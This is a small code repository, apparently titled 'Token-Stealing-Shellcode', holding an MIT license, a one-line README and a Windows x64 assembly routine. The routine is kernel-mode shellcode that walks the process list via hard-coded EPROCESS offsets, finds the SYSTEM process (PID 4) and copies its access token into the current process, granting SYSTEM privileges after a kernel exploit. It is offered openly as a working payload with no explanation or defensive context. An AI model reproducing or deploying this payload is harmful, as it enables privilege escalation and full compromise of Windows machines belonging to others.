├── LICENSE ├── README.md └── TokenStealing.asm /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 MortenSchenk 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Token-Stealing-Shellcode -------------------------------------------------------------------------------- /TokenStealing.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | TokenStealingPayload PROC 4 | mov r9, qword ptr gs:[188h] 5 | mov r9, qword ptr [r9 + 220h] 6 | mov r8, qword ptr [r9 + 3e0h] 7 | mov rax, r9 8 | loop1: 9 | mov rax, qword ptr [rax + 2f0h] 10 | sub rax, 2f0h 11 | cmp qword ptr [rax + 2e8h], r8 12 | jne loop1 13 | mov rcx, rax 14 | add rcx, 358h 15 | mov rax, r9 16 | loop2: 17 | mov rax, qword ptr [rax + 2f0h] 18 | sub rax, 2f0h 19 | cmp qword ptr [rax + 2e8h], 4 20 | jne loop2 21 | mov rdx, rax 22 | add rdx, 358h 23 | mov rdx, qword ptr [rdx] 24 | mov qword ptr [rcx], rdx 25 | ret 26 | TokenStealingPayload ENDP 27 | 28 | END --------------------------------------------------------------------------------